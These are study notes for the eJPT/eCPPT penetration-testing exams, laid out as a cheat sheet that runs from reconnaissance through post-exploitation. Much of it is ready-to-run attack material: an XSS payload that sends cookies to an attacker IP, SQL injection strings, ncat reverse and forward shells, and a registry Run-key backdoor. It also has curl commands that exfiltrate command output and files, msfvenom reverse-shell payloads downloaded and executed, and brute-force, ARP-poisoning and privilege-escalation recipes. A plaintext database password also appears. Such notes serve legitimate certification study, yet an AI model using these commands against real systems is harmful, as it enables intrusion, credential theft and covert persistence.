eJPT/eCPPT Notes
Useful Notes for the eJPT and eCPPT exams.
Methodology
Testing Checklist
Refer to the OWASP Testing Checklist: Testing Checklist
Routing
Check Routes
Command:
route
Add Route
Command:
ip route add <network_ip>/<cidr> via <gateway_ip> dev <network_card_name>
Start Python Server
Recommended to change into
/tmpdirectoryCommand:
python -m SimpleHTTPServer 8080Put things in the same directory to access them via a webpage
Web
Netcat
Start a connection:
nc -v hack.me 80Make GET request:
GET / HTTP/1.1 Host: hack.meOnly works for HTTP
For HTTPS use OpenSSL
Command:
openssl s_client -connect hack.me:443Use
-debug,-statefor more infoUse
-quietto remove connection info
Information Gathering
Open Source
Crunchbase: IT startup database, information about founders, investors, employees, buyouts, acquisitions
Whois Database: Owner name, address, email, technical contacts
Subdomain Enumeration
Passive Enumeration
Google query:
"site:company.com"Tools:
virustotal.com: Search cached DNS subdomains
crt.sh: Collect SSL certificates and valid domain names
Inspecting certificates on domains may lead to more subdomains
Tools for Subdomain Enumeration
sublist3r:
Command:
sublist3r -d google.comHas brute force option that parses provided wordlist
amass:
Install:
apt install snapd service start snapd snap install amass snap run amassExample:
snap run amass -ip -d google.com
Footprinting & Scanning
Mapping a Network
fping performs a ping sweep on an IP range:
Commands:
fping -a -g 10.54.12.0/24 fping -a -g 10.54.12.0 10.54.12.255 fping -a -g 10.54.12.0/24 2>/dev/null
nmap can perform ping scans with the
-snflag:Command:
nmap -sn 200.200.0.0/16 nmap -sn 200.200.123.1-12 nmap -sn 172.16.12.* nmap -sn 200.200.12-13.* nmap -iL <file_with_hosts>
OS Fingerprinting
nmap can fingerprint OS with
-Oflag, use-Pnflag to skip ping:Command:
nmap -O -Pn <targets>
Port Scanning
TCP Connect Scan:
SYN -> <- SYN + ACK
ACK -> RST + ACK (closes connection)
Scanning Closed Port:
SYN -> <- RST + ACK (port is closed)
nmap Port Scanning
Common Flags:
-sT: TCP connect scan-sS: SYN scan-sV: Version detection-Pn: Skips ping sweep, useful if network has firewalls or blocks ICMP packets
Spotting Firewall
Incomplete nmap results on well-known services like a web server:
Example: βhttp?β or βtcpwrappedβ means remote host closed connection without receiving data
Use
nmap --reasonto get more information on why a port is open or closed
masscan
Used for scanning large networks quickly, not as accurate as nmap:
Example:
./masscan -p 80,443,22 -Pn --rate=800 --banners 10.142.111.0/24 -e tap0 --router-ip 10.142.111.1 --echo > masscan.txt
Vulnerability Assessment
Nessus
Popular vulnerability scanner, uses a client & server:
Starts with a ping sweep and port scan, then probes each daemon and cross-checks responses with a vulnerability database
Prone to false positives
Installing Nessus
Command:
dpkg -i nessus.deb
Usage
Commands:
service nessusd startOpen web interface (may need to add security exception)
Setup custom policy and scan using GUI, export results
Web Attacks
Web Server Fingerprinting
Netcat:
Command:
nc <target_ip> 80After connecting, send a valid HTTP request:
HEAD /HTTP/1.1Netcat only works on HTTP websites, for HTTPS use OpenSSL:
Command:
openssl s_client -connect target.site:443Example:
HEAD / HTTP/1.0
Automated Fingerprinting Tool httprint
Example:
httprint -P0 -h <target_ip> -s /usr/share/httprint/signatures.txtFlags:
-P0: Not ping web server-h: Define host-s: Define signature file
HTTP Verbs
GET: Used to request resource
GET /page.php HTTP/1.1 HOST: www.example.comPOST: Used to submit HTML form data
POST /login.php HTTP/1.1 HOST: www.example.com username=John&password=yourmomHEAD: Used to grab header
HEAD / HTTP/1.1 HOST: www.example.comPUT: Used to upload file to server
PUT /path/to/destination HTTP/1.1 HOST: www.example.com <Put data>You must know the size of the file you are trying to upload
Example:
wc -m payload.php 20 payload.php PUT /payload.php HTTP/1.1 Content-type: text/html Content-length: 20 <?php phpinfo(); ?>
DELETE: Used to remove file from server
DELETE /path/to/destination HTTP/1.1 HOST: www.example.comOPTIONS: Used to query web server for available HTTP verbs
OPTIONS / HTTP/1.1 HOST: www.example.com
Netcat
Setup nc Listener or Server
Command:
nc -lvp 8888Connect to nc listener:
nc -v 127.0.0.1 8888To make connection UDP: Add
-uSending file over nc:
Command:
cat tobesent.txt | nc -v 127.0.0.1 8888
Reverse Shell:
Command:
nc -lvp 1337 -e /bin/bash
Dirbuster / Dirb
Dirbuster
GUI based directory enumerator
Dirb
Command line based directory enumerator
Basic Usage
Commands:
apt install dirb dirb http://google.com dirb http://google.com /usr/share/dirb/wordlists/small.txt
Common Flags
-a: Change user agent to make request look like they come from a browser, useragentstring.com-c βCOOKIE: XYZβ: Specifies cookie in request-u βadmin:passwordβ: User authentication in request-H βMy Header: My contentβ: Add header into request-r: Turn off recursive search βsub directoriesβ-z 1000: Changes speed to one request a second-s: Silent mode: only displays items that were found-X β.php,.bakβ: Append extensions to word list-x extensions.txt: Include file with extensions-o results.txt: Saved results in output file
Run dirb through Proxy βBurpβ
Command:
dirb http://google.com -p http://127.0.0.1:8080
MySQL
Login to MySQL Server
Command:
mysql -u awdmgmt -pUChxKQk96dVtM07 -h 10.104.11.198-ufor user-pfor password (no space)
Google Dorking
site: Only include results from specified host
intitle: Filters results based on title of page
inurl: Text included in URL
filetype: Used to search for specific file extensions .pdf, .xls
AND, OR, &, |: Logical operators for queries
-: Used to filter out words
Cross-Site Scripting (XSS)
Overview
Occurs when web application uses unfiltered user input to build the output content displayed to its end users; this lets an attacker control the HTML and Javascript code, thus attacking the application user.
User Input
Any parameter coming from client side of web app such as:
Request headers
Cookies
Form inputs
POST parameters
GET parameters
Payloads
Alert that XSS is there:
<script>alert("oh boy xss");</script>Steal cookies:
<script>alert(document.cookie);</script>Steal cookies and send them to attacker controlled site:
<script> var i = new Image(); i.src="http://192.168.99.11/get.php?cookies="+document.cookie; </script>
SQL
Example Query
Command:
SELECT name, description FROM products WHERE id=9;
Web App Use
In order for a web app to use database it must:
Connect to database
Submit query
Retrieve results before applications can use results
Example SQL Injection
Command:
' OR 'a' ='a ' UNION SELECT Username, Password FROM Accounts WHERE 'a'='a
Finding Injection Points
Test every supplied user input used by the web app:
GET parameters
POST parameters
HTTP headers:
User-Agent
Cookie
Accept
Input SQL Injection
String terminators:
',"Commands:
SELECT,UNIONSQL Comments:
#,--
SQL Functions
Commands:
show databases; // shows databases use selected_db; // replace selected_db with db show tables; // shows tables in selected db select * from flag; // shows all records in flag update users set adm="yes" where username="tracking1"; // update records in db
More Commands
SELECT user();// displays current database userselect substring(user(), 1, 1) = 'r';// returns a true or false (0 or 1), effective for learning more about what db contains
Union Based Injection
Commands:
UNION SELECT user(); -- -; UNION SELECT null, null; -- - // two fields in this example UNION SELECT 'els1', 'els2', 'els3'; -- -
SQLMap
Overview
Open source penetration testing tool that automates process of detecting SQL injection
Capable of both detecting and exploiting
Always recommended to test by hand first to avoid crashing DB
Basic Syntax
Command:
sqlmap -u <URL> -p <injection_parameters> [options]
Examples
Command:
sqlmap -u 'http://victim.site/view.php?id=1' -p id --technique=UTest the id parameter of the GET request for view.php, tells sqlmap to use UNION based injection
To test POST request:
sqlmap -u <URL> --data=<POST_String> -p parameter [options]Command:
sqlmap -u http://sql.site/view.php?id=1 sqlmap -u http://sql.site/view.php?id=1 -b sqlmap -u http://sql.site/view.php?id=1 --tables sqlmap -u http://sql.site/view.php?id=1 --current-db selfie4u --columns sqlmap -u http://sql.site/view.php?id=1 --current-db selfie4u --dump
More SQLMap Syntax
-v3: Displays queries used--users: Enumerate users--dns: See what dbs are connected-D dbname --tables: Specify db and enumerate tables-T specified table --columns: Grab columns from specified tables-C specify columns, column2 --dump: Dump records of specified columns--data='user=a&pass=a': POST injection, grab post info from burp-suite
Metasploit SQL Enumeration
Use auxiliary/scanner/mssql/mssql_login
Backdoors
Hide ncat in Windows systems32 directory
Forward Shell
On Windows machine:
ncat -l -p 5555 -e cmd.exeOn attacker machine:
ncat 192.168.0.25 5555
Reverse Shell
On attacker machine:
ncat -l -p 5555 -vOn Windows machine:
ncat -e cmd.exe 192.168.0.24 5555
Persistent Backdoor
Start listener on attacker machine
Open regedit on Windows machine
Navigate to
Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunRight-click and add new string value, name ncat, edit string value and add path to ncat binary along with reverse shell syntax:
"C:\Windows\System32\ncat.exe <attacker_ip> <port> -e cmd.exe"Restart victim machine to activate shell
Password Attacks
JohnTheRipper
After acquiring
/etc/passwd(hashed passwords on Linux system) &/etc/shadow(users on Linux system), John needs user and pass to be in the same file:Command:
unshadow passwd shadow > crackmeBrute Force:
john --incremental --user:<users_to_crack> <file_to_crack>To display passwords recovered by John:
john --show crackmeCracked passwords stored in file
Dictionary Attack
Command:
john --wordlist=custom_wordlist --rules <file_to_crack>Good wordlist to install:
apt-get install seclists
Rainbow Tables
Tables containing passwords that have been pre-hashed saving time and computational power.
Ophcrack: Rainbow table password cracking tool
Authentication Cracking
Hydra
Tools used for cracking network services such as HTTP, SSH, FTP, etc.
Syntax:
hydra -L users.txt -P pass.txt <service://server> <options>
Configuring Hydra
Inspect page source
Figure out how credentials are being sent to server (POST)
Figure out names of parameters being sent (pwd, usr)
Example Webpage:
hydra crackme.site http-post-form "/login.php:usr=^USR^&pwd=^PASS^:invalid credentials" -L /usr/share/ncrack/minimal.usr -P /usr/share/seclists/Passwords/rockyou.txt -f -V-L: List of user names-P: List of passwords-f: Hydra will stop after first credential found-V: Verbosity
Example SSH:
hydra 192.168.102.143 ssh -L /usr/share/ncrack/minimal.usr -P /usr/share/seclists/Passwords/rockyou-10.txt -f -V
Windows Shares
UNC or Universal Naming Convention Paths
\\servername\ShareName\file.net
Administrative Shares
\\ComputerName\C$: Lets admin access volume on local machine\\ComputerName\admin$: Points to the Windows installation directory\\ComputerName\ipc$: Used for interprocess communication
Nul Sessions
An anonymous connection to an inter-process communication network service on Windows-based computers:
Check and see if the target has any file server enabled
nbstat -A 10.123.162.2ornbstat \?for helpThe third line down will tell you if the target is sharing any files in the <> field
If file server is enabled, enumerate shares with
NET VIEWNET VIEW <target_ip>Try to connect to share
NET USE \\<target_ip>\IPC$ '' /u:''(connect to the IPC$ share without authentication)
enum:
Script that automates enumeration of shares
Commands:
enum -S <target_ip> // enumerates shares enum -U <target_ip> // enumerates users enum -P <target_ip> // enumerates password policies
winfo:
Another enumeration tool
Command:
winfo <target_ip> -n // -n for null session
Linux Version
nmblookup -A <target_ip>smbclient -L \\:<target_ip> -N
Use instead:
smbclient -L <WORKGROUP> -I <TARGET_IP> -N -U ""(allows you to see services on target,-Nforces no password)
smbclient //<target_ip>/IPC$ -N
Use instead:
smbclient \\\\<target_ip>\\<target_share> -N(connects to IPC share without authentication)
Enumeration Scripts
enum4linux script:
Enumerates shares
Brute force enumeration:
enum4linux -s /usr/share/enum4linux/share-list.txt <target_ip>
samrdump.py:
Enumerates info about users using null sessions
Command:
/usr/share/doc/python-impacket-doc/examples# python samrdump.py <target_ip>
nmap smb enumeration:
Commands:
nmap --script=smb-enum-shares <target_ip> // enumerates shares nmap --script=smb-enum-users <target_ip> // enumerates users nmap --script=smb-brute <target_ip> // brute force authentication
ARP Poisoning
Works by changing the ARP caches on two network nodes. Attacker sends unsolicited ARP packets to the two nodes telling them to route traffic through the attacker computer.
Enable Packet Forwarding
Command:
echo 1 > proc/sys/net/ipv4/ip_forward
Dsniff
Tool used for ARP poisoning:
Example:
arpspoof -i <interface> -t <target> -r <host>-i: NIC-t&-r: Victims
You can then run Wireshark to see the traffic
Metasploit
Framework for Exploiting Machines
Requirements Before Use
Commands:
service postgresql start service metasploit start
Start
Command:
msfconsole
Help
Command:
show -h
Search
Command:
search <search_term>
Show All Exploits
Command:
show exploits
Use Exploit
Command:
use exploit/windows/ftp/turboftp_port
Go "Back"
Command:
back
Get Info About Exploit
Command:
info
See Exploit Options
Command:
options
Configure Exploit Parameters
Command:
set
See Available Payloads
Command:
show payloads
Set Payload
Command:
set payload windows/meterpreter/reverse_tcp
Launch Exploit/Payload
Command:
exploit
Create Listener
Commands:
use exploit/multi/handler set payload php/reverse_php set payload php/meterpreter_reverse_php set payload php/meterpreter_reverse_tcp
Upgrade to Meterpreter
Commands:
background current session use post/multi/manage/shell_to_meterpreter
Scan for SMB Vulnerabilities with nmap
Command:
nmap --script smb-check-vulns.nse --script-args=unsafe=1 <target_ip>
Meterpreter
Advanced Shell
Search for Meterpreter Payloads
Command:
search meterpreter
Put Session in Background
Command:
background
List Current Sessions
Command:
sessions -l
Resume Session
Command:
sessions -i 1
Get Info About Machine
Command:
sysinfo
Network Info
Command:
ifconfig
Routing Tables
Command:
route
Get Current User ID
Command:
getuid
Elevate Privilege
Command:
getsystemIf operation fails, try the following:
Background session
Search bypassuac
Use exploit /windows/local/bypassuac
Set session
Exploit
Uploading/Downloading Files
Command:
upload <path>ordownload <path>
Use Standard OS Shell
Command:
shell
See All Processes Running
Command:
ps
See Process Meterpreter is Attached to
Command:
getpid
Check UAC
Command:
run post/windows/gather/win_privs
Migrating Process to be Stealthy
When migrating process, the new process must have the same level of privilege:
Command:
ps -U SYSTEMThis command will search for all other processes with system-level privilege:
Command:
migrate <pid>
Remote Code Execution (RCE)
Blind RCE
Test bash sleep command to see if page is delayed:
Command:
sleep 5
Testing Network Connectivity
Use Wireshark to pick up ICMP packets:
Command:
ping <attacker> -c 5May need to use URL encoding to keep syntax intact
Testing Webshell
Get Paths to Installed Programs
Command:
echo $PATH
Look for Specific Tools
Command:
which <tool>
Curl
See if You Can Establish TCP Connection
On Attacker:
Setup listener with nc:
nc -lvp 53
On Target:
Establish TCP with curl:
curl http://<attacker_ip>:<attacker_port>
Test Commands with Curl
Commands:
curl http://<attacker_ip>:<attacker_port>/'whoami'
Test Commands with Spaces in the Output with Curl
Commands:
curl http://<attacker_ip>:<attacker_port>/'id'Command above will not display properly because there are spaces in the output, need to encode to see full output:
Command:
curl http://<attacker_ip>:<attacker_port>/'id|base64'
To decode:
Command:
echo "fsdaflasdfsjdf" | base64 -d
Downloading Files with Curl
Command:
curl http://<attacker_ip>:<attacker_port>/file -T /etc/issue
Uploading Files
Start simple Python HTTP server:
Command:
python -m SimpleHTTPServer 9090All files in directory you start Python server in will be available via server
Generate payload & store it in server directory:
Command:
msfvenom -p linux/x64/shell_reverse_tcp lhost=<attacker_ip> lport=<port_on_listener> -f elf -o reverse53
Get payload on victim machine:
Command:
curl http://<attacker_server>:<server_port>/reverse53 -o /tmp/r chmod +x /tmp/r
Test if file was uploaded by downloading it:
Command:
curl http://<victim_ip>:<victim_port>/ -T /tmp/r
Running payload:
Command:
start nc listener /tmp/r
Spawning a Better Shell:
Command:
bash -iSpawns bash environment
There are lots of shells you can easily spawn, look them up βspawning tty shellβ:
Command:
python -c 'import pty; pty.spawn("/bin/bash")';
Pivoting with Meterpreter
Command:
background current session and then: run autoroute -s 172.16.50.0/24
Last updated